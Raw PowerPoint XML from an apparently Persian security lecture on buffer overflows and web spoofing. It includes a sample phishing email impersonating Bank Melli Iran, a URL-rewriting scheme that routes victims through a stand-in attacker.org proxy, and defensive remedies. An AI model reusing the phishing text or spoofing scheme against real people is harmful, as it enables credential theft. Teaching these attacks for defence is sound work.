                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برنامه از  تابع خارج شده و </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کدهاي </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نوشته شده در آدرس </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>0x41414141</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>…..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> را </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اجرا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ميکند!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Explosion 1 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="5486400"/>
            <a:ext cx="1371600" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">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mtClean="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Crash!</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fa-IR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77"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9</a:t>
            </a:fld>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64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6" presetClass="entr" presetSubtype="32" fill="hold" grpId="0" nodeType="click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circle(out)">
                                      <p:cBhvr>
                                        <p:cTn id="2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50" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="76"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990600" y="0"/>
            <a:ext cx="7696200" cy="1143000"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Starting the Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The attacker must somehow lure the victim into the attacker’s false web. there are several ways to do this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> An attacker could put a link to false Web onto popular Web page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> If the victim is using Web-enabled email, the attacker could email the victim a pointer to false Web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Finally, the attacker could trick a web search engine into indexing part of a false Web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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90</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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990600" y="0"/>
            <a:ext cx="7848600" cy="1143000"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Have you ever received an e-mail like this?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1219200"/>
            <a:ext cx="7391400" cy="5257800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>From:	Bank  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Melli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> Iran</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>To:		&lt;some one&gt; some_one@mail.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Subject:	Your Online Banking Account is Inactive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Your Online Banking Account is  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Innactive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>We closed your online access for security reasons.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0066FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Click here to access your account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>We must verify your account information.       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Bank </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Melli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> Iran, N.A. Member FDIC. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>© 2008 Bank </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Melli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> Iran Corporation. All rights reserved. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43012" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="5791200"/>
            <a:ext cx="2127250" cy="600075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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91</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med"/>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990600" y="152400"/>
            <a:ext cx="7696200" cy="685800"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Spoofing attacks in the physical world</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44035" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1447800"/>
            <a:ext cx="8229600" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>In the physical world  For example, there have been several incidents in which criminals set up bogus automated teller machines. the criminal copy the victim’s card and use the duplicate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> In these attacks people were fooled for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>  what they saw. The location of the machine and The appearance of their electronic displays.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>People using computer system often makes security relevant decisions based on contextual cues they see. For example you might decide to type in you account number because you believe you are visiting your bank’s web page. This belief might arise because the page has a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>familiar look</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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92</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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143000" y="274638"/>
            <a:ext cx="7543800" cy="715962"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45059" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1524000"/>
            <a:ext cx="8001000" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>A browser presents many types of context that users might rely on to make decisions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Appearance – the appearance of an object might convey  a certain impressions.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Name of Objects – people often deduce what is in a file by its name.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Timing of Events – if 2 things happen at the same time, the user might think they are related.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0066FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is MICR0SOFT.COM or MICROSOFT.COM the correct address for Microsoft? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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93</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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143000" y="152400"/>
            <a:ext cx="7543800" cy="838200"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>URL Rewriting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1371600"/>
            <a:ext cx="8229600" cy="4678363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>The attacker’s first trick is to rewrite all of the URLs on some web page so that they point to the attacker’s server rather than the real server. Assuming the attacker’s server is on the machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.attacker.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>, the attacker rewrites a URL by adding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.attacker.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> to the front of the URL. For example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://home.netscape.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> becomes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.attacker.org/http://home.netscape.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Once the  attacker’s server has fetched the real document needed to satisfy the request, the attacker rewrites all of the URLs. in the document into the same special form. Then the attacker’s server provides the rewritten page to the victim’s browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>If the victim fallows a link on the new page, the victim remains trapped in the attacker’s false web.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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94</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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066800" y="0"/>
            <a:ext cx="7620000" cy="1143000"/>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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Remedies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1295400"/>
            <a:ext cx="8229600" cy="4754563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disable JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in your browser so the attacker will be unable to hide the evidence of the attack;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make sure your browser’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>location line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is always visible;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pay attention to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> displayed on your browser’s location line, making sure they always point to the server you think you are connected to.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do not click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>on links you receive in an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e-mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> message asking for sensitive personal, financial or account information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Call the company </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>directly to confirm requests for updating or verifying personal or account information.</a:t>
            </a:r>
          </a:p>
          <a:p>
